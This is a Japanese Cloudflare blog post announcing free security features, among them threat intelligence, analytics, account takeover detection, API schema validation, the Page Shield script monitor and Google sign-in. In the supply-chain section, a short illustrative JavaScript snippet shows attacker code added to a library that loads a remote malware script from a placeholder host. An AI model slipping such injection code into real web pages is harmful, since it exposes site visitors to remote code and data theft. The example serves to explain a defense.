新規投稿のお知らせを受信されたい方は、サブスクリプションをご登録ください:

Cloudflareでより安全なインターネットを:無料の脅威インテリジェンス、分析、新しい脅威検出

2024-09-24

10分で読了
この投稿はEnglish繁體中文FrançaisDeutsch한국어Español简体中文でも表示されます。

インターネットを使う人なら誰しも、Cloudflareで保護されたサイトへのアクセス、弊社の1.1.1.1リゾルバーの利用、さらにCloudflare One製品を使ったネットワーク経由での接続などにより、Cloudflareのネットワークに日常的に触れています。

この事実は、Cloudflareが世界中の何十億人ものユーザーのためにインターネットをより安全なものにする大きな責任を負っていることを意味します。現在、弊社はすべてのお客様に脅威インテリジェンスと10以上の新セキュリティ機能を無償で提供しています。CloudflareをWebサイト、ホームネットワーク、オフィスの保護にご利用になっているかにかかわらず、わずか数クリックで利用しはじめられる便利なプロダクトが見つかります。

これらの機能は、アカウント乗っ取り攻撃サプライチェーン攻撃APIエンドポイントに対する攻撃ネットワークの可視性ネットワークからのデータ漏洩など、サイバーセキュリティで最も懸念される事項に焦点を当てています。

すべてのお客様に高いセキュリティを

各機能の詳細は以下のセクションをご自身で参照していただけますが、ここで短く要約しておきます。

サイバーセキュリティに携わる方へ:新設したCloudforce One脅威インテリジェンスWebサイトにアクセスし、脅威アクター、攻撃キャンペーン、その他のインターネット全体のセキュリティ問題をご覧ください。

Webサイト所有者の方へ:本日より、すべてのFreeプランでゾーンのSecurity Analyticsにアクセスできるようになります。さらに、DNS AnalyticsもGraphQLを通じて誰でも利用できるようにしています。

可視性を確保した次は、次は正当なトラフィックと悪意のあるトラフィックを区別することになります。すべてのお客様は、常時稼働のアカウント乗っ取り攻撃検出、APIエンドポイントにポジティブセキュリティモデルを適用するAPIスキーマ検証、お客様側から読み込んでおりサプライチェーンベースの攻撃に使用される可能性があるサードパーティ資産を可視化するPage Shieldスクリプトモニターをご利用いただけます。

ユーザーとネットワークを保護するためにCloudflareを使用している場合:さまざまなCloudflare One製品を新しい無料サービスにバンドルします。このバンドルには、現在無料で提供しているZero Trust製品や、ネットワークの可視性を確保するMagic Network Monitoring、機密データを保存するData Loss Prevention、ネットワークの接続性とパフォーマンスを測定するDigital Experience Monitoringなどの新製品が含まれます。Cloudflareは、こうしたタイプの製品の無料版を提供する唯一のベンダーとなっています。

新規ユーザーの場合:新しい認証オプションを用意しています。本日より、CloudflareへのサインアップとログインにGoogle認証を使用するオプションを導入します。これにより、一部のお客様は簡単にログインできるようになり、パスワードを記憶する必要性が減り、結果的にCloudflareアカウントの安全性が損なわれるリスクが低減します。

では、以降、詳細を説明します:

脅威インテリジェンスと分析

Cloudforce One

弊社の脅威研究・運用チームであるCloudforce Oneより、無料アクセス可能な脅威インテリジェンスWebサイトの立ち上げを発表します。当該サイトでは、最新の脅威アクターの活動や戦術に関する技術情報とエグゼクティブ向けの情報、そして新たなマルウェア、脆弱性、攻撃に関する知見を公開します。

また、新しい2つの脅威インテリジェンスを公開し、より多くの情報を提供していく予定です。こちらの新設Webサイトにアクセスし、南アジアおよび東アジアに至る局所的な組織を標的とした継続的および国家を絞ったアクターについてカバーした最新の研究、ならびにダブルブローカリングによる貨物事業者を狙った詐欺の流行についてご覧ください。

ご登録いただくと、今後の脅威リサーチのお知らせメールをお受け取りいただけます。

セキュリティ分析

セキュリティ分析は、軽減されたリクエストだけでなく、HTTPトラフィックすべてのセキュリティという切り口をもたらし、最も重要なもの、つまり、悪意があると判断されるが軽減されていない可能性があるトラフィックに集中できるようにします。つまり、セキュリティイベントを使ってアプリケーションセキュリティ製品スイートのセキュリティ対策を表示するだけでなく、セキュリティ分析を使ってすべてのトラフィックの異常や異常な挙動を確認し、得られた知見を基に正確な軽減ルールを策定することができることになり、これがCloudflareのトラフィックパターンに基づいてフィルタリングされることを意味します。本日より、このレンズがすべてのプランのお客様にご利用いただけるようになります。 FreeプランとProプランのユーザーを対象に、セキュリティ分析の新たなダッシュボードにアクセスし、Traffic Analyticsチャートでトラフィックの高レベルの概要を表示できるようになります。これにはグループ化とフィルタリング機能が含まれ、異常に簡単に注目できるようになります。また、国、ソースブラウザ、ソースOS、HTTPバージョン、SSLプロトコルバージョン、キャッシュステータス、セキュリティ対策など、さまざまなディメンションで上位の統計情報や絞り込みもできます。

DNSアナリティクス

Cloudflareのすべてのユーザーの方を対象に、新しく改善されたDNS分析ダッシュボードより、強力なGraphQL APIで新しいDNS分析データセットにアクセスしていただけるようになりました。これにより、お客様のドメインへのDNSクエリを簡単に分析できるようになりました。強力なフィルタリングを適用し、DNSクエリをソース別に分類することで、問題のトラブルシューティング、パターンや傾向の検出、使用レポートの生成などに役立ちます。

Foundation DNSの立ち上げに伴い、GraphQLベースの新しいDNS分析を導入しましたが、これらの分析は以前は高度なネームサーバーを使用するゾーンでのみ利用可能でした。しかし、この分析から得られる深い洞察の質を鑑み、この機能は誰でも利用できるようにすべきだと考えました。本日より、DNSセクションのAnalyticsからCloudflareの権威DNSサービスを使用して、すべてのゾーンでGraphQLベースの新しいDNS Analyticsにアクセスできるようになりました。

アプリケーション脅威の検出と軽減

アカウント乗っ取り検出

パスワードの再利用や大規模なデータ漏洩の頻度の高まりにより、インターネットユーザーの65%がアカウント乗っ取り(ATO)に対し脆弱となっています。より良いインターネットの構築には、重要性の高いアカウント保護をすべての人が簡単かつ利用しやすいようにする必要があります。

本日より、クレデンシャルスタッフィングやその他のATO攻撃を防止する堅牢なアカウントセキュリティを個人ユーザーから大企業まですべての人を対象に無料で提供し、資格情報漏えいチェックやATO検出などの強化機能を無料で利用できるようにします。 

これらのアップデートには、ログインの自動検出、最小限のセットアップで総当たりパスワード攻撃の防止、弊社独自のデータベースに加えてHave I bened(HIBP)サービスから漏えいしたパスワードを含む150億以上のパスワードを登録する包括的漏洩資格情報データベースへのアクセスが含まれます。レート制限ルールカスタムルールのようなCloudflareのWAF機能を使用して、漏えいした資格情報リクエストへの対処に活用できます。もしくは、多要素認証(MFA)の徹底やシステムに送信されたヘッダーに基づきパスワードのリセットを要求するなど、上流側で対処することもできます。

セットアップはシンプル:Freeプランユーザーは自動検出され、有料ユーザーはCloudflareダッシュボードからワンクリックで新機能を有効化できます。セットアップと設定の詳細をドキュメントでご覧いただき、さっそくご利用ください!

APIスキーマの検証

APIトラフィックは、Cloudflareネットワーク上の動的トラフィックの半分以上を占めています。APIの人気により、まったく新しい攻撃ベクトルセットが生まれました。Cloudflare API Shieldのスキーマ検証は、これらの新しい脅威に直面してAPIセキュリティを強化するための最初のステップとなります。

これにより初めて、あらゆるCloudflareのお客様がスキーマ検証を使用して、APIへの有効なリクエストのみがオリジンに到達することを確認できるようになります。

この機能により、バグによる偶発的な情報漏洩ならびに開発者が非標準プロセスでエンドポイントを不用意に公開することが阻止され、CI/CDプロセスの一環としてAPIインベントリが最新に保たれるため、ゾンビAPIを自動的にブロックします。

CloudflareのAPIまたはTerraformプロバイダーを使用し、Cloudflare API Shieldにエンドポイントを追加し、コードをビルド後のCI/CDプロセスの一部としてリリースした後にスキーマを更新することをお勧めします。こうすることでAPI Shieldが頼りになるAPIインベントリツールとなり、スキーマ検証が予期しないAPIへのリクエストを処理するようになります。

APIはほとんどがサードパーティと統合している中、アプリケーションに直接ライブラリを読み込むことで統合されることもあります。続いて弊社では、ページの入力内容から機密情報を盗む悪意のあるサードパーティスクリプトからユーザーを保護することにより、Webの安全性をさらに高めていきます。

サプライチェーン攻撃の防止

最新のWebアプリは、サードパーティのJavaScriptライブラリを使うことでユーザーエクスペリエンスを向上させ、開発者が必要とする時間を短縮します。ページ上のすべてのものへの特権アクセスレベルにより、侵害されたサードパーティのJavaScriptライブラリは、エンドユーザーやサイト管理者が気づかないうちに機密情報をひそかに攻撃者に流出させることができます。 この脅威に対抗するため、弊社は3年前にPage Shieldを導入しました。この度、Page Shieldのスクリプトモニターをすべてのユーザーに無料でリリースすることとなりました。

スクリプトモニターを使用すると、開発者が含めたものだけでなく、ページに読み込まれたすべてのJavaScriptアセットが表示されます。この可視性には、他のスクリプトによって動的にロードされたスクリプトも含まれます。攻撃者が一度ライブラリを侵害した場合、既存のJavaScriptアセットに新しいコードを含めることで、元のHTMLのコンテキストを変更することなく新しい悪意のあるスクリプトを簡単に追加できます。

// Original library code (trusted)
function someLibraryFunction() {
    // useful functionality here
}

// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);

Polyfill.ioライブラリの所有権変更ニュースが流れた際、スクリプトモニターが不可欠になりました。Script Monitorのユーザーは、サイト上に読み込まれたスクリプトを即座に可視化でき、リスクにさらされているかどうかを迅速かつ容易に把握することができました。

弊社ではすべてのお客様向けにスクリプトモニターをリリースし、これらのスクリプトの可視性を可能な限りWebに拡張できることとなりました。利用開始方法は、このドキュメントでご確認ください。

Page Shieldの既存のユーザーは、アプリでPolyfill.ioまたは他のライブラリが使用されているかどうかを知ることができ、監視されたデータですぐに絞り込めます。さらに、弊社は侵害されたサービスに対応するためにPolyfill.ioのリライトを構築しました。これは、2024年6月にFreeプランで自動的に有効化されました。

Google Firebase拡張機能としてのTurnstile 

弊社は、手動で設定する必要のないシームレスな統合を提供するGoogle Firebase向けCloudflare Turnstile App Check Providerを発表いたします。この新しい拡張機能により、Firebase上でモバイルアプリケーションやWebアプリケーションを構築する開発者は、CloudflareのCAPTCHA代替ツールを使ってボットからプロジェクトを保護できます。Turnstileのボット検出機能とチャレンジ機能を活用することで、正規の人間の訪問者のみがFirebaseのバックエンドサービスと対話するようにでき、セキュリティとユーザーエクスペリエンスの両方を強化できます。Cloudflare Turnstileは、プライバシーを重視したCAPTCHAの代替製品であり、ユーザーエクスペリエンスを阻害することなく人間とボットを区別します。ユーザーがあきらめやすい従来のCAPTCHAソリューションとは異なり、Turnstileは目に見えない形で動作し、摩擦のないユーザーインタラクションを構築するためにさまざまなモードを提供しています。

Turnstile用のFirebase App Check拡張機能は統合が容易で、開発者は最小限のセットアップでアプリのセキュリティを迅速に強化できます。この拡張機能も、Turnstileの無料ティアで無制限かつ無料で使用できます。Google FirebaseのバックエンドサービスとCloudflareのTurnstileの利点を組み合わせることで、開発者はユーザーに安全でシームレスなエクスペリエンスを提供できます。 

Cloudflare One

Cloudflare Oneは、インターネットで人、アプリ、デバイス、ネットワークを保護し、接続するために設計された包括的なセキュアアクセスサービスエッジ(SASE)プラットフォームです。Zero Trustネットワークアクセス(ZTNA)、セキュアWebゲートウェイ(SWG)などのサービスを1つのソリューションに統合します。Cloudflare Oneは、Cloudflareのグローバルネットワークを経由してルーティングすることで、すべての人による人々とネットワークの保護、アクセス制御の管理、サイバー脅威からの保護、データの保護、ネットワークトラフィックのパフォーマンスの向上を実現します。企業リソースへのアクセスを保護および合理化するためにクラウドベースのアプローチを提供するものであり、従来のセキュリティ対策の代替となります。

過去2年間にCloudflare Oneに追加された4つの新製品がすべての方に無料でご利用いただけるようになりました:

すでにCloudflare Oneプラットフォームに組み込まれている既存のネットワークセキュリティ製品への追加となります:

  • ユーザーのIDを検証し、使用すべきアプリケーションのみを許可するためのアクセス

  • パブリックインターネットとプライベートネットワークの両方に送信されるネットワークトラフィックを保護するためのゲートウェイ

  • Cloudflare、および異なるアプリケーション、サーバー、プライベートネットワークをCloudflareのネットワークに接続するためのWARP Connectorの両方を含む、弊社のアプリコネクターであるCloudflare Tunnel

  • ノートパソコンやモバイル端末からインターネットへ安全にトラフィックを送信するための、弊社のデバイスエージェントであるCloudflare WARP

Cloudflareアカウントを持つユーザーはどなたでも、Cloudflare One組織内のこれらすべての製品の50名様分の利用権が自動的に提供されます。弊社の無料製品の詳細、およびメンバー数50名を超えるチーム向けの従量課金プランと契約プランの詳細は、Zero Trust & SASEプランのページをご覧ください。

Googleでの認証

Cloudflareのダッシュボード自体が保護の必要な重要リソースであるため、弊社はCloudflareユーザーアカウントの安全性が損なわれないよう多くの時間を費やしています。

そのため、アプリベースの二要素認証(2FA)、パスキー、SSO、Sign in with Appleなどの認証方法を追加することで、セキュリティを強化しています。本日、Googleアカウントでサインアップおよびサインインする機能を追加しました。 

Cloudflareは、異なるユースケースに合わせた複数の認証ワークフローに対応しています。SSOおよびパスキーが最も安全な認証方法として知られている中、パスワードよりも強力な認証要素を提供することで、ギャップを埋め、ユーザーの全体的なセキュリティの平均を向上させられると考えています。Googleでサインインすることで、ユーザーによる操作はより簡単になり、すでにGoogle IDでWebをブラウジングしている際にさらに別のパスワードを覚えておく必要はなくなります。 

GoogleでのサインインはOAuth 2.0仕様に基づいており、Googleは特定のIDに関する識別情報を安全に共有できるようになります。同時に、この情報を提供するのはGoogleであることが保証され、悪意のある行為者がGoogleになりすますことを防ぎます。

つまり、Googleに認証を委任することができ、このCloudflare IDに対する直接的なゼロ知識攻撃を防ぐことができるのです。

Cloudflareのサインインページにアクセスすると、下のボタンが表示されます。クリックするとCloudflareに登録でき、登録を済ませた後はGoogleアカウントに設定した既存の保護機能を使用してパスワードを入力せずにサインインできます。

この機能の発表により、Cloudflareは自社のCloudflare Workersを用い、OIDC互換のIDプロバイダー(GitHubやMicrosoftアカウントなど)の抽象化レイヤーを提供しています。これにより、弊社のユーザーがIDプロバイダー(IdP)との連携を今後増加できることをご期待いただけます。

現時点では、GoogleアカウントでサインインできるのはGoogleでサインアップする新規のお客様のみであるものの、今後より多くのユーザーに対して実装し、ソーシャルログインプロバイダーとのリンク/リンク解除機能を追加し、手段となるソーシャルログイン方法を追加していく予定です。SSOセットアップが確立されているEnterpriseユーザーは、現時点ではこの方法をお使いいただけません。Google WorkspaceをベースとしたSSOセットアップが確立されている企業は、アクセスと確立されているIdPポリシーの合理化を弊社が検討してCloudflare環境をロックダウンするため、SSOフローに転送されます。

Cloudflareをお使いになられたばかりであり、Googleアカウントをお持ちであれば、ご自身のWebサイトの保護、新サービスの構築にCloudflareを使い始め、もしくはCloudflareが提供するその他サービスをお試しいただくのがこれまでになく簡単になっています。

より安全なインターネット

Cloudflareが掲げてきた目標の1つに、大企業規模のリソースがなくても誰もが安全にコンテンツを提供できインターネットに接続できるよう、サイバーセキュリティツールを民主化することが挙げられます。

そのため、Web管理者、ネットワーク管理者、サイバーセキュリティ関係者向けの幅広いセキュリティユースケースをカバーする新機能を、すべてのCloudflareユーザーに無償で提供することを決定しました。

Cloudflareのアカウントにログインし、これらの発表内容を今すぐご活用ください。コミュニティフォーラムでフィードバックをお待ちしています。今後も引き続き、既存の機能と新機能の両方を改善し続けていきます。

Cloudflare TVで視聴する

Cloudflareは企業ネットワーク全体を保護し、お客様がインターネット規模のアプリケーションを効率的に構築し、あらゆるWebサイトやインターネットアプリケーションを高速化し、DDoS攻撃を退けハッカーの侵入を防ぎゼロトラスト導入を推進できるようお手伝いしています。

ご使用のデバイスから1.1.1.1 にアクセスし、インターネットを高速化し安全性を高めるCloudflareの無料アプリをご利用ください。

より良いインターネットの構築支援という当社の使命について、詳しくはこちらをご覧ください。新たなキャリアの方向性を模索中の方は、当社の求人情報をご覧ください。
Birthday WeekセキュリティCASBDLPData Loss PreventionThreat IntelligenceゼロトラストCloudflare OnePage ShieldLeaked Credential ChecksSASE

Xでフォロー

Michael Tremante|@MichaelTremante
Reid Tatoris|@reidtatoris
Cloudflare|@cloudflare

関連ブログ投稿

2024年10月23日 13:00

Fearless SSH: short-lived certificates bring Zero Trust to infrastructure

Access for Infrastructure, BastionZero’s integration into Cloudflare One, will enable organizations to apply Zero Trust controls to their servers, databases, Kubernetes clusters, and more. Today we’re announcing short-lived SSH access as the first available feature of this integration. ...